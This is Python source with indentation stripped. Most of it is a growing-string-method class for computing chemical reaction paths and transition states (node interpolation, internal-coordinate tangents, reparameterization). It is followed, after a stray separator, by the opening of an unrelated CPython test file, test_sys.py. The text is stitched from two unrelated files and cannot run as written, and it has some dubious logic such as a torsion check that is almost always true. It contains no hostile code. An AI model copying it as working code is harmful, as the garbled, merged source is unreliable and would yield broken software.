opt.add_option(
key='xyz_writer',
value=write_molden_geoms,
required=False,
doc='Function to be used to format and write XYZ files',
)
opt.add_option(
key='mp_cores',
value=1,
doc='multiprocessing cores for parallel programming. Use this with caution.',
)
opt.add_option(
key="BDIST_RATIO",
value=0.5,
required=False,
doc="SE-Crossing uses this \
bdist must be less than 1-BDIST_RATIO of initial bdist in order to be \
to be considered grown.",
)
opt.add_option(
key='ID',
value=0,
required=False,
doc='A number for identification of Strings'
)
opt.add_option(
key='interp_method',
value='DLC',
allowed_values=['Geodesic', 'DLC'],
required=False,
doc='Which reparameterization method to use',
)
opt.add_option(
key='noise',
value=100.0,
allowed_types=[float],
required=False,
doc='Noise to check for intermediate',
)
GSM._default_options = opt
return GSM._default_options.copy()
@classmethod
def from_options(cls, **kwargs):
return cls(cls.default_options().set_values(kwargs))
@classmethod
def copy_from_options(cls, gsm_obj, reactant, product):
new_gsm = cls.from_options(gsm_obj.options.copy().set_values({'reactant': reactant, 'product': product}))
return new_gsm
def __init__(
self,
options,
):
""" Constructor """
self.options = options
os.system('mkdir -p scratch')
# Cache attributes
self.nnodes = self.options['nnodes']
self.nodes = [None]*self.nnodes
self.nodes[0] = self.options['reactant']
self.nodes[-1] = self.options['product']
self.driving_coords = self.options['driving_coords']
self.growth_direction = self.options['growth_direction']
self.isRestarted = False
self.DQMAG_MAX = self.options['DQMAG_MAX']
self.DQMAG_MIN = self.options['DQMAG_MIN']
self.BDIST_RATIO = self.options['BDIST_RATIO']
self.ID = self.options['ID']
self.optimizer = []
self.interp_method = self.options['interp_method']
self.CONV_TOL = self.options['CONV_TOL']
self.noise = self.options['noise']
self.mp_cores = self.options['mp_cores']
self.xyz_writer = self.options['xyz_writer']
optimizer = options['optimizer']
for count in range(self.nnodes):
self.optimizer.append(optimizer.__class__(optimizer.options.copy()))
self.print_level = options['print_level']
# Set initial values
self.current_nnodes = 2
self.nR = 1
self.nP = 1
self.climb = False
self.find = False
self.ts_exsteps = 3 # multiplier for ts node
self.n0 = 1 # something to do with added nodes? "first node along current block"
self.end_early = False
self.tscontinue = True # whether to continue with TS opt or not
self.found_ts = False
self.rn3m6 = np.sqrt(3.*self.nodes[0].natoms-6.)
self.gaddmax = self.options['ADD_NODE_TOL'] # self.options['ADD_NODE_TOL']/self.rn3m6;
print(" gaddmax:", self.gaddmax)
self.ictan = [None]*self.nnodes
self.active = [False] * self.nnodes
self.climber = False # is this string a climber?
self.finder = False # is this string a finder?
self.done_growing = False
self.nclimb = 0
self.nhessreset = 10 # are these used??? TODO
self.hessrcount = 0 # are these used?! TODO
self.hess_counter = 0 # it is probably good to reset the hessian
self.newclimbscale = 2.
self.TS_E_0 = None
self.dE_iter = 100. # change in max TS node
self.nopt_intermediate = 0 # might be a duplicate of endearly_counter
self.flag_intermediate = False
self.endearly_counter = 0 # Find the intermediate x time
self.pot_min = []
self.ran_out = False # if it ran out of iterations
self.newic = Molecule.copy_from_options(self.nodes[0]) # newic object is used for coordinate transformations
@property
def TSnode(self):
'''
The current node with maximum energy
'''
# Treat GSM with penalty a little different since penalty will increase energy based on energy
# differences, which might not be great for Climbing Image
if self.__class__.__name__ != "SE_Cross" and self.nodes[0].PES.__class__.__name__ == "Penalty_PES":
energies = np.asarray([0.]*self.nnodes)
for i, node in enumerate(self.nodes):
if node is not None:
energies[i] = (node.PES.PES1.energy + node.PES.PES2.energy)/2.
return int(np.argmax(energies))
else:
# make sure TS is not zero or last node
return int(np.argmax(self.energies[1:self.nnodes-1])+1)
@property
def emax(self):
return self.energies[self.TSnode]
@property
def npeaks(self):
'''
'''
minnodes = []
maxnodes = []
energies = self.energies
if energies[1] > energies[0]:
minnodes.append(0)
if energies[self.nnodes-1] < energies[self.nnodes-2]:
minnodes.append(self.nnodes-1)
for n in range(self.n0, self.nnodes-1):
if energies[n+1] > energies[n]:
if energies[n] < energies[n-1]:
minnodes.append(n)
if energies[n+1] < energies[n]:
if energies[n] > energies[n-1]:
maxnodes.append(n)
return len(maxnodes)
@property
def energies(self):
'''
Energies of string
'''
E = []
for ico in self.nodes:
if ico is not None:
E.append(ico.energy - self.nodes[0].energy)
return E
@energies.setter
def energies(self, list_of_E):
'''
setter for energies
'''
self.E = list_of_E
@property
def geometries(self):
geoms = []
for ico in self.nodes:
if ico is not None:
geoms.append(ico.geometry)
return geoms
@property
def gradrmss(self):
self._gradrmss = []
for ico in self.nodes:
if ico is not None:
self._gradrmss.append(ico.gradrms)
return self._gradrmss
@property
def dEs(self):
self._dEs = []
for ico in self.nodes:
if ico is not None:
self._dEs.append(ico.difference_energy)
return self._dEs
@property
def ictan(self):
return self._ictan
@ictan.setter
def ictan(self, value):
self._ictan = value
@property
def dqmaga(self):
return self._dqmaga
@dqmaga.setter
def dqmaga(self, value):
self._dqmaga = value
@staticmethod
def add_xyz_along_tangent(
xyz1,
constraints,
step,
coord_obj,
):
dq0 = step*constraints
new_xyz = coord_obj.newCartesian(xyz1, dq0)
return new_xyz
@staticmethod
def add_node(
nodeR,
nodeP,
stepsize,
node_id,
**kwargs
):
'''
Add a node between nodeR and nodeP or if nodeP is none use driving coordinate to add new node
'''
# get driving coord
driving_coords = kwargs.get('driving_coords', None)
DQMAG_MAX = kwargs.get('DQMAG_MAX', 0.8)
DQMAG_MIN = kwargs.get('DQMAG_MIN', 0.2)
if nodeP is None:
if driving_coords is None:
raise RuntimeError("You didn't supply a driving coordinate and product node is None!")
BDISTMIN = 0.05
ictan, bdist = GSM.get_tangent(nodeR, None, driving_coords=driving_coords)
if bdist < BDISTMIN:
print("bdist too small %.3f" % bdist)
return None
new_node = Molecule.copy_from_options(nodeR, new_node_id=node_id)
new_node.update_coordinate_basis(constraints=ictan)
constraint = new_node.constraints[:, 0]
sign = -1.
dqmag_scale = 1.5
minmax = DQMAG_MAX - DQMAG_MIN
a = bdist/dqmag_scale
if a > 1.:
a = 1.
dqmag = sign*(DQMAG_MIN+minmax*a)
if dqmag > DQMAG_MAX:
dqmag = DQMAG_MAX
print(" dqmag: %4.3f from bdist: %4.3f" % (dqmag, bdist))
dq0 = dqmag*constraint
print(" dq0[constraint]: %1.3f" % dqmag)
new_node.update_xyz(dq0)
new_node.bdist = bdist
else:
ictan, _ = GSM.get_tangent(nodeR, nodeP)
nodeR.update_coordinate_basis(constraints=ictan)
constraint = nodeR.constraints[:, 0]
dqmag = np.linalg.norm(ictan)
print(" dqmag: %1.3f" % dqmag)
# sign=-1
sign = 1.
dqmag *= (sign*stepsize)
print(" scaled dqmag: %1.3f" % dqmag)
dq0 = dqmag*constraint
old_xyz = nodeR.xyz.copy()
new_xyz = nodeR.coord_obj.newCartesian(old_xyz, dq0)
new_node = Molecule.copy_from_options(MoleculeA=nodeR, xyz=new_xyz, new_node_id=node_id)
return new_node
@staticmethod
def interpolate_xyz(nodeR, nodeP, stepsize):
'''
Interpolate between two nodes
'''
ictan, _ = GSM.get_tangent(nodeR, nodeP)
Vecs = nodeR.update_coordinate_basis(constraints=ictan)
constraint = nodeR.constraints[:, 0]
prim_constraint = block_matrix.dot(Vecs, constraint)
dqmag = np.dot(prim_constraint.T, ictan)
print(" dqmag: %1.3f" % dqmag)
# sign=-1
sign = 1.
dqmag *= (sign*stepsize)
print(" scaled dqmag: %1.3f" % dqmag)
dq0 = dqmag*constraint
old_xyz = nodeR.xyz.copy()
new_xyz = nodeR.coord_obj.newCartesian(old_xyz, dq0)
return new_xyz
@staticmethod
def interpolate(start_node, end_node, num_interp):
'''
'''
nifty.printcool(" interpolate")
num_nodes = num_interp + 2
nodes = [None]*(num_nodes)
nodes[0] = start_node
nodes[-1] = end_node
sign = 1
nR = 1
nP = 1
nn = nR + nP
for n in range(num_interp):
if num_nodes - nn > 1:
stepsize = 1./float(num_nodes - nn)
else:
stepsize = 0.5
if sign == 1:
iR = nR-1
iP = num_nodes - nP
iN = nR
nodes[nR] = GSM.add_node(nodes[iR], nodes[iP], stepsize, iN)
if nodes[nR] is None:
raise RuntimeError
# print(" Energy of node {} is {:5.4}".format(nR,nodes[nR].energy-E0))
nR += 1
nn += 1
else:
n1 = num_nodes - nP
n2 = n1 - 1
n3 = nR - 1
nodes[n2] = GSM.add_node(nodes[n1], nodes[n3], stepsize, n2)
if nodes[n2] is None:
raise RuntimeError
# print(" Energy of node {} is {:5.4}".format(nR,nodes[nR].energy-E0))
nP += 1
nn += 1
sign *= -1
return nodes
@staticmethod
def get_tangent_xyz(xyz1, xyz2, prim_coords):
PMDiff = np.zeros(len(prim_coords))
for k, prim in enumerate(prim_coords):
if type(prim) is Distance:
PMDiff[k] = 2.5 * prim.calcDiff(xyz2, xyz1)
else:
PMDiff[k] = prim.calcDiff(xyz2, xyz1)
return np.reshape(PMDiff, (-1, 1))
@staticmethod
def get_tangent(node1, node2, print_level=1, **kwargs):
'''
Get internal coordinate tangent between two nodes, assumes they have unique IDs
'''
if node2 is not None and node1.node_id != node2.node_id:
print(" getting tangent from between %i %i pointing towards %i" % (node2.node_id, node1.node_id, node2.node_id))
assert node2 != None, 'node n2 is None'
PMDiff = np.zeros(node2.num_primitives)
for k, prim in enumerate(node2.primitive_internal_coordinates):
if type(prim) is Distance:
PMDiff[k] = 2.5 * prim.calcDiff(node2.xyz, node1.xyz)
else:
PMDiff[k] = prim.calcDiff(node2.xyz, node1.xyz)
return np.reshape(PMDiff, (-1, 1)), None
else:
print(" getting tangent from node ", node1.node_id)
driving_coords = kwargs.get('driving_coords', None)
assert driving_coords is not None, " Driving coord is None!"
c = Counter(elem[0] for elem in driving_coords)
nadds = c['ADD']
nbreaks = c['BREAK']
nangles = c['nangles']
ntorsions = c['ntorsions']
ictan = np.zeros((node1.num_primitives, 1), dtype=float)
# breakdq = 0.3
bdist = 0.0
atoms = node1.atoms
xyz = node1.xyz.copy()
for i in driving_coords:
if "ADD" in i:
# order indices to avoid duplicate bonds
if i[1] < i[2]:
index = [i[1]-1, i[2]-1]
else:
index = [i[2]-1, i[1]-1]
bond = Distance(index[0], index[1])
prim_idx = node1.coord_obj.Prims.dof_index(index, 'Distance')
if len(i) == 3:
# TODO why not just use the covalent radii?
d0 = (atoms[index[0]].vdw_radius + atoms[index[1]].vdw_radius)/2.8
elif len(i) == 4:
d0 = i[3]
current_d = bond.value(xyz)
# TODO don't set tangent if value is too small
ictan[prim_idx] = -1*(d0-current_d)
# if nbreaks>0:
# ictan[prim_idx] *= 2
# => calc bdist <=
if current_d > d0:
bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
if print_level > 0:
print(" bond %s target (less than): %4.3f current d: %4.3f diff: %4.3f " % ((i[1], i[2]), d0, current_d, ictan[prim_idx]))
elif "BREAK" in i:
# order indices to avoid duplicate bonds
if i[1] < i[2]:
index = [i[1]-1, i[2]-1]
else:
index = [i[2]-1, i[1]-1]
bond = Distance(index[0], index[1])
prim_idx = node1.coord_obj.Prims.dof_index(index, 'Distance')
if len(i) == 3:
d0 = (atoms[index[0]].vdw_radius + atoms[index[1]].vdw_radius)
elif len(i) == 4:
d0 = i[3]
current_d = bond.value(xyz)
ictan[prim_idx] = -1*(d0-current_d)
# => calc bdist <=
if current_d < d0:
bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
if print_level > 0:
print(" bond %s target (greater than): %4.3f, current d: %4.3f diff: %4.3f " % ((i[1], i[2]), d0, current_d, ictan[prim_idx]))
elif "ANGLE" in i:
if i[1] < i[3]:
index = [i[1]-1, i[2]-1, i[3]-1]
else:
index = [i[3]-1, i[2]-1, i[1]-1]
angle = Angle(index[0], index[1], index[2])
prim_idx = node1.coord_obj.Prims.dof_index(index, 'Angle')
anglet = i[4]
ang_value = angle.value(xyz)
ang_diff = anglet*np.pi/180. - ang_value
# print(" angle: %s is index %i " %(angle,ang_idx))
if print_level > 0:
print((" anglev: %4.3f align to %4.3f diff(rad): %4.3f" % (ang_value, anglet, ang_diff)))
ictan[prim_idx] = -ang_diff
# TODO need to come up with an adist
# if abs(ang_diff)>0.1:
# bdist+=ictan[ICoord1.BObj.nbonds+ang_idx]*ictan[ICoord1.BObj.nbonds+ang_idx]
elif "TORSION" in i:
if i[1] < i[4]:
index = [i[1]-1, i[2]-1, i[3]-1, i[4]-1]
else:
index = [i[4]-1, i[3]-1, i[2]-1, i[1]-1]
torsion = Dihedral(index[0], index[1], index[2], index[3])
prim_idx = node1.coord_obj.Prims.dof_index(index, 'Dihedral')
tort = i[5]
torv = torsion.value(xyz)
tor_diff = tort - torv*180./np.pi
if tor_diff > 180.:
tor_diff -= 360.
elif tor_diff < -180.:
tor_diff += 360.
ictan[prim_idx] = -tor_diff*np.pi/180.
if tor_diff*np.pi/180. > 0.1 or tor_diff*np.pi/180. < 0.1:
bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
if print_level > 0:
print((" current torv: %4.3f align to %4.3f diff(deg): %4.3f" % (torv*180./np.pi, tort, tor_diff)))
elif "OOP" in i:
index = [i[1]-1, i[2]-1, i[3]-1, i[4]-1]
oop = OutOfPlane(index[0], index[1], index[2], index[3])
prim_idx = node1.coord_obj.Prims.dof_index(index, 'OutOfPlane')
oopt = i[5]
oopv = oop.value(xyz)
oop_diff = oopt - oopv*180./np.pi
if oop_diff > 180.:
oop_diff -= 360.
elif oop_diff < -180.:
oop_diff += 360.
ictan[prim_idx] = -oop_diff*np.pi/180.
if oop_diff*np.pi/180. > 0.1 or oop_diff*np.pi/180. < 0.1:
bdist += np.dot(ictan[prim_idx], ictan[prim_idx])
if print_level > 0:
print((" current oopv: %4.3f align to %4.3f diff(deg): %4.3f" % (oopv*180./np.pi, oopt, oop_diff)))
bdist = np.sqrt(bdist)
if np.all(ictan == 0.0):
raise RuntimeError(" All elements are zero")
return ictan, bdist
@staticmethod
def get_tangents(nodes, n0=0, print_level=0):
'''
Get the normalized internal coordinate tangents and magnitudes between all nodes
'''
nnodes = len(nodes)
dqmaga = [0.]*nnodes
ictan = [[]]*nnodes
for n in range(n0+1, nnodes):
# print "getting tangent between %i %i" % (n,n-1)
assert nodes[n] is not None, "n is bad"
assert nodes[n-1] is not None, "n-1 is bad"
ictan[n] = GSM.get_tangent_xyz(nodes[n-1].xyz, nodes[n].xyz, nodes[0].primitive_internal_coordinates)
dqmaga[n] = 0.
# ictan0= np.copy(ictan[n])
dqmaga[n] = np.linalg.norm(ictan[n])
ictan[n] /= dqmaga[n]
# NOTE:
# vanilla GSM has a strange metric for distance
# no longer following 7/1/2020
# constraint = self.newic.constraints[:,0]
# just a fancy way to get the normalized tangent vector
# prim_constraint = block_matrix.dot(Vecs,constraint)
# for prim in self.newic.primitive_internal_coordinates:
# if type(prim) is Distance:
# index = self.newic.coord_obj.Prims.dof_index(prim)
# prim_constraint[index] *= 2.5
# dqmaga[n] = float(np.dot(prim_constraint.T,ictan0))
# dqmaga[n] = float(np.sqrt(dqmaga[n]))
if dqmaga[n] < 0.:
raise RuntimeError
# TEMPORORARY parallel idea
# ictan = [0.]
# ictan += [ Process(target=get_tangent,args=(n,)) for n in range(n0+1,self.nnodes)]
# dqmaga = [ Process(target=get_dqmag,args=(n,ictan[n])) for n in range(n0+1,self.nnodes)]
if print_level > 1:
print('------------printing ictan[:]-------------')
for n in range(n0+1, nnodes):
print("ictan[%i]" % n)
print(ictan[n].T)
if print_level > 0:
print('------------printing dqmaga---------------')
for n in range(n0+1, nnodes):
print(" {:5.4}".format(dqmaga[n]), end='')
if (n) % 5 == 0:
print()
print()
return ictan, dqmaga
@staticmethod
def get_three_way_tangents(nodes, energies, find=True, n0=0, print_level=0):
'''
Calculates internal coordinate tangent with a three-way tangent at TS node
'''
nnodes = len(nodes)
ictan = [[]]*nnodes
dqmaga = [0.]*nnodes
# TSnode = np.argmax(energies[1:nnodes-1])+1
TSnode = np.argmax(energies) # allow for the possibility of TS node to be endpoints?
last_node_max = (TSnode == nnodes-1)
first_node_max = (TSnode == 0)
if first_node_max or last_node_max:
print("*********** This will cause a range error in the following for loop *********")
print("** Setting the middle of the string to be TS node to get proper directions **")
TSnode = nnodes//2
for n in range(n0, nnodes):
do3 = False
print('getting tan[{' + str(n) + '}]')
if n < TSnode:
# The order is very important here
# the way it should be ;(
intic_n = n+1
newic_n = n
# old way
# intic_n = n
# newic_n = n+1
elif n > TSnode:
# The order is very important here
intic_n = n
newic_n = n-1
else:
do3 = True
newic_n = n
intic_n = n+1
int2ic_n = n-1
if do3:
if first_node_max or last_node_max:
t1, _ = GSM.get_tangent(nodes[intic_n], nodes[newic_n])
t2, _ = GSM.get_tangent(nodes[newic_n], nodes[int2ic_n])
print(" done 3 way tangent")
ictan0 = t1 + t2
else:
f1 = 0.
dE1 = abs(energies[n+1]-energies[n])
dE2 = abs(energies[n] - energies[n-1])
dEmax = max(dE1, dE2)
dEmin = min(dE1, dE2)
if energies[n+1] > energies[n-1]:
f1 = dEmax/(dEmax+dEmin+0.00000001)
else:
f1 = 1 - dEmax/(dEmax+dEmin+0.00000001)
print(' 3 way tangent ({}): f1:{:3.2}'.format(n, f1))
t1, _ = GSM.get_tangent(nodes[intic_n], nodes[newic_n])
t2, _ = GSM.get_tangent(nodes[newic_n], nodes[int2ic_n])
print(" done 3 way tangent")
ictan0 = f1*t1 + (1.-f1)*t2
else:
ictan0, _ = GSM.get_tangent(nodes[newic_n], nodes[intic_n])
ictan[n] = ictan0/np.linalg.norm(ictan0)
dqmaga[n] = np.linalg.norm(ictan0)
return ictan, dqmaga
@staticmethod
def ic_reparam(nodes, energies, climbing=False, ic_reparam_steps=8, print_level=1, NUM_CORE=1, MAXRE=0.25):
'''
Reparameterizes the string using Delocalizedin internal coordinatesusing three-way tangents at the TS node
Only pushes nodes outwards during reparameterization because otherwise too many things change.
Be careful, however, if the path is allup or alldown then this can cause
Parameters
----------
nodes : list of molecule objects
energies : list of energies in kcal/mol
ic_reparam_steps : int max number of reparameterization steps
print_level : int verbosity
'''
nifty.printcool("reparametrizing string nodes")
nnodes = len(nodes)
rpart = np.zeros(nnodes)
for n in range(1, nnodes):
rpart[n] = 1./(nnodes-1)
deltadqs = np.zeros(nnodes)
TSnode = np.argmax(energies)
disprms = 100
if ((TSnode == nnodes-1) or (TSnode == 0)) and climbing:
raise RuntimeError(" TS node shouldn't be the first or last node")
ideal_progress_gained = np.zeros(nnodes)
if climbing:
for n in range(1, TSnode):
ideal_progress_gained[n] = 1./(TSnode)
for n in range(TSnode+1, nnodes):
ideal_progress_gained[n] = 1./(nnodes-TSnode-1)
ideal_progress_gained[TSnode] = 0.
else:
for n in range(1, nnodes):
ideal_progress_gained[n] = 1./(nnodes-1)
for i in range(ic_reparam_steps):
ictan, dqmaga = GSM.get_tangents(nodes)
totaldqmag = np.sum(dqmaga)
if climbing:
progress = np.zeros(nnodes)
progress_gained = np.zeros(nnodes)
h1dqmag = np.sum(dqmaga[:TSnode+1])
h2dqmag = np.sum(dqmaga[TSnode+1:nnodes])
if print_level > 0:
print(" h1dqmag, h2dqmag: %3.2f %3.2f" % (h1dqmag, h2dqmag))
progress_gained[:TSnode] = dqmaga[:TSnode]/h1dqmag
progress_gained[TSnode+1:] = dqmaga[TSnode+1:]/h2dqmag
progress[:TSnode] = np.cumsum(progress_gained[:TSnode])
progress[TSnode:] = np.cumsum(progress_gained[TSnode:])
else:
progress = np.cumsum(dqmaga)/totaldqmag
progress_gained = dqmaga/totaldqmag
if i == 0:
orig_dqmaga = copy(dqmaga)
orig_progress_gained = copy(progress_gained)
if climbing:
difference = np.zeros(nnodes)
for n in range(TSnode):
difference[n] = ideal_progress_gained[n] - progress_gained[n]
deltadqs[n] = difference[n]*h1dqmag
for n in range(TSnode+1, nnodes):
difference[n] = ideal_progress_gained[n] - progress_gained[n]
deltadqs[n] = difference[n]*h2dqmag
else:
difference = ideal_progress_gained - progress_gained
deltadqs = difference*totaldqmag
if print_level > 1:
print(" ideal progress gained per step", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, ideal_progress_gained[n]), end=' ')
print()
print(" path progress ", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, progress_gained[n]), end=' ')
print()
print(" difference ", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, difference[n]), end=' ')
print()
print(" deltadqs ", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, deltadqs[n]), end=' ')
print()
# disprms = np.linalg.norm(deltadqs)/np.sqrt(nnodes-1)
disprms = np.linalg.norm(deltadqs)/np.sqrt(nnodes-1)
print(" disprms: {:1.3}\n".format(disprms))
if disprms < 0.02:
break
# Move nodes
if climbing:
deltadqs[TSnode-2] -= deltadqs[TSnode-1]
deltadqs[nnodes-2] -= deltadqs[nnodes-1]
for n in range(1, nnodes-1):
if abs(deltadqs[n]) > MAXRE:
deltadqs[n] = np.sign(deltadqs[n])*MAXRE
for n in range(TSnode-1):
deltadqs[n+1] += deltadqs[n]
for n in range(TSnode+1, nnodes-2):
deltadqs[n+1] += deltadqs[n]
for n in range(nnodes):
if abs(deltadqs[n]) > MAXRE:
deltadqs[n] = np.sign(deltadqs[n])*MAXRE
if NUM_CORE > 1:
# 5/14/2021 TS node fucks this up?!
tans = [ictan[n] if deltadqs[n] < 0 else ictan[n+1] for n in chain(range(1, TSnode), range(TSnode+1, nnodes-1))] # + [ ictan[n] if deltadqs[n]<0 else ictan[n+1] for n in range(TSnode+1,nnodes-1)]
pool = mp.Pool(NUM_CORE)
Vecs = pool.map(worker, ((nodes[0].coord_obj, "build_dlc", node.xyz, tan) for node, tan in zip(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1], tans)))
pool.close()
pool.join()
for n, node in enumerate(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1]):
node.coord_basis = Vecs[n]
# move the positions
dqs = [deltadqs[n]*nodes[n].constraints[:, 0] for n in chain(range(1, TSnode), range(TSnode+1, nnodes-1))]
pool = mp.Pool(NUM_CORE)
newXyzs = pool.map(worker, ((node.coord_obj, "newCartesian", node.xyz, dq) for node, dq in zip(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1], dqs)))
pool.close()
pool.join()
for n, node in enumerate(nodes[1:TSnode] + nodes[TSnode+1:nnodes-1]):
node.xyz = newXyzs[n]
else:
for n in chain(range(1, TSnode), range(TSnode+1, nnodes-1)):
if deltadqs[n] < 0:
# print(f" Moving node {n} along tan[{n}] this much {deltadqs[n]}")
print(" Moving node {} along tan[{}] this much {}".format(n, n, deltadqs[n]))
nodes[n].update_coordinate_basis(ictan[n])
constraint = nodes[n].constraints[:, 0]
dq = deltadqs[n]*constraint
nodes[n].update_xyz(dq, verbose=(print_level > 1))
elif deltadqs[n] > 0:
print(" Moving node {} along tan[{}] this much {}".format(n, n+1, deltadqs[n]))
nodes[n].update_coordinate_basis(ictan[n+1])
constraint = nodes[n].constraints[:, 0]
dq = deltadqs[n]*constraint
nodes[n].update_xyz(dq, verbose=(print_level > 1))
else:
# e.g 11-2 = 9, deltadq[9] -= deltadqs[10]
deltadqs[nnodes-2] -= deltadqs[nnodes-1]
for n in range(1, nnodes-1):
if abs(deltadqs[n]) > MAXRE:
deltadqs[n] = np.sign(deltadqs[n])*MAXRE
for n in range(1, nnodes-2):
deltadqs[n+1] += deltadqs[n]
for n in range(1, nnodes-1):
if abs(deltadqs[n]) > MAXRE:
deltadqs[n] = np.sign(deltadqs[n])*MAXRE
if NUM_CORE > 1:
# Update the coordinate basis
tans = [ictan[n] if deltadqs[n] < 0 else ictan[n+1] for n in range(1, nnodes-1)]
pool = mp.Pool(NUM_CORE)
Vecs = pool.map(worker, ((nodes[0].coord_obj, "build_dlc", node.xyz, tan) for node, tan in zip(nodes[1:nnodes-1], tans)))
pool.close()
pool.join()
for n, node in enumerate(nodes[1:nnodes-1]):
node.coord_basis = Vecs[n]
# move the positions
dqs = [deltadqs[n]*nodes[n].constraints[:, 0] for n in range(1, nnodes-1)]
pool = mp.Pool(NUM_CORE)
newXyzs = pool.map(worker, ((node.coord_obj, "newCartesian", node.xyz, dq) for node, dq in zip(nodes[1:nnodes-1], dqs)))
pool.close()
pool.join()
for n, node in enumerate(nodes[1:nnodes-1]):
node.xyz = newXyzs[n]
else:
for n in range(1, nnodes-1):
if deltadqs[n] < 0:
# print(f" Moving node {n} along tan[{n}] this much {deltadqs[n]}")
print(" Moving node {} along tan[{}] this much {}".format(n, n, deltadqs[n]))
nodes[n].update_coordinate_basis(ictan[n])
constraint = nodes[n].constraints[:, 0]
dq = deltadqs[n]*constraint
nodes[n].update_xyz(dq, verbose=(print_level > 1))
elif deltadqs[n] > 0:
print(" Moving node {} along tan[{}] this much {}".format(n, n+1, deltadqs[n]))
nodes[n].update_coordinate_basis(ictan[n+1])
constraint = nodes[n].constraints[:, 0]
dq = deltadqs[n]*constraint
nodes[n].update_xyz(dq, verbose=(print_level > 1))
if climbing:
ictan, dqmaga = GSM.get_tangents(nodes)
h1dqmag = np.sum(dqmaga[:TSnode+1])
h2dqmag = np.sum(dqmaga[TSnode+1:nnodes])
if print_level > 0:
print(" h1dqmag, h2dqmag: %3.2f %3.2f" % (h1dqmag, h2dqmag))
progress_gained[:TSnode] = dqmaga[:TSnode]/h1dqmag
progress_gained[TSnode+1:] = dqmaga[TSnode+1:]/h2dqmag
progress[:TSnode] = np.cumsum(progress_gained[:TSnode])
progress[TSnode:] = np.cumsum(progress_gained[TSnode:])
else:
ictan, dqmaga = GSM.get_tangents(nodes)
totaldqmag = np.sum(dqmaga)
progress = np.cumsum(dqmaga)/totaldqmag
progress_gained = dqmaga/totaldqmag
print()
if print_level > 0:
print(" ideal progress gained per step", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, ideal_progress_gained[n]), end=' ')
print()
print(" original path progress ", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, orig_progress_gained[n]), end=' ')
print()
print(" reparameterized path progress ", end=' ')
for n in range(nnodes):
print(" step [{}]: {:1.3f}".format(n, progress_gained[n]), end=' ')
print()
print(" spacings (begin ic_reparam, steps", end=' ')
for n in range(nnodes):
print(" {:1.2}".format(orig_dqmaga[n]), end=' ')
print()
print(" spacings (end ic_reparam, steps: {}/{}):".format(i+1, ic_reparam_steps), end=' ')
for n in range(nnodes):
print(" {:1.2}".format(dqmaga[n]), end=' ')
print("\n disprms: {:1.3}".format(disprms))
return
# TODO move to string utils or delete altogether
#def get_current_rotation(self,frag,a1,a2):
# '''
# calculate current rotation for single-ended nodes
# '''
#
# # Get the information on fragment to rotate
# sa,ea,sp,ep = self.nodes[0].coord_obj.Prims.prim_only_block_info[frag]
#
# theta = 0.
# # Haven't added any nodes yet
# if self.nR==1:
# return theta
# for n in range(1,self.nR):
# xyz_frag = self.nodes[n].xyz[sa:ea].copy()
# axis = self.nodes[n].xyz[a2] - self.nodes[n].xyz[a1]
# axis /= np.linalg.norm(axis)
#
# # only want the fragment of interest
# reference_xyz = self.nodes[n-1].xyz.copy()
# # Turn off
# ref_axis = reference_xyz[a2] - reference_xyz[a1]
# ref_axis /= np.linalg.norm(ref_axis)
# # ALIGN previous and current node to get rotation around axis of rotation
# #print(' Rotating reference axis to current axis')
# I = np.eye(3)
# v = np.cross(ref_axis,axis)
# if v.all()==0.:
# print('Rotation is identity')
# R=I
# else:
# vx = np.array([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])
# c = np.dot(ref_axis,axis)
# s = np.linalg.norm(v)
# R = I + vx + np.dot(vx,vx) * (1. - c)/(s**2)
# new_ref_axis = np.dot(ref_axis,R.T)
# #print(' overlap of ref-axis and axis (should be 1.) %1.2f' % np.dot(new_ref_axis,axis))
# new_ref_xyz = np.dot(reference_xyz,R.T)
#
# # Calculate dtheta
# ca = self.nodes[n].primitive_internal_coordinates[sp+3]
# cb = self.nodes[n].primitive_internal_coordinates[sp+4]
# cc = self.nodes[n].primitive_internal_coordinates[sp+5]
# dv12_a = ca.calcDiff(self.nodes[n].xyz,new_ref_xyz)
# dv12_b = cb.calcDiff(self.nodes[n].xyz,new_ref_xyz)
# dv12_c = cc.calcDiff(self.nodes[n].xyz,new_ref_xyz)
# dv12 = np.array([dv12_a,dv12_b,dv12_c])
# #print(dv12)
# dtheta = np.linalg.norm(dv12) #?
#
# dtheta = dtheta + np.pi % (2*np.pi) - np.pi
# theta += dtheta
# theta = theta/ca.w
# angle = theta * 180./np.pi
# print(angle)
# return theta
@staticmethod
def calc_optimization_metrics(nodes):
'''
'''
nnodes = len(nodes)
rn3m6 = np.sqrt(3*nodes[0].natoms-6)
totalgrad = 0.0
gradrms = 0.0
sum_gradrms = 0.0
for i, ico in enumerate(nodes[1:nnodes-1]):
if ico != None:
print(" node: {:02d} gradrms: {:.6f}".format(i, float(ico.gradrms)), end='')
if i % 5 == 0:
print()
totalgrad += ico.gradrms*rn3m6
gradrms += ico.gradrms*ico.gradrms
sum_gradrms += ico.gradrms
print('')
# TODO wrong for growth
gradrms = np.sqrt(gradrms/(nnodes-2))
return totalgrad, gradrms, sum_gradrms
|
test_sys.py | import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
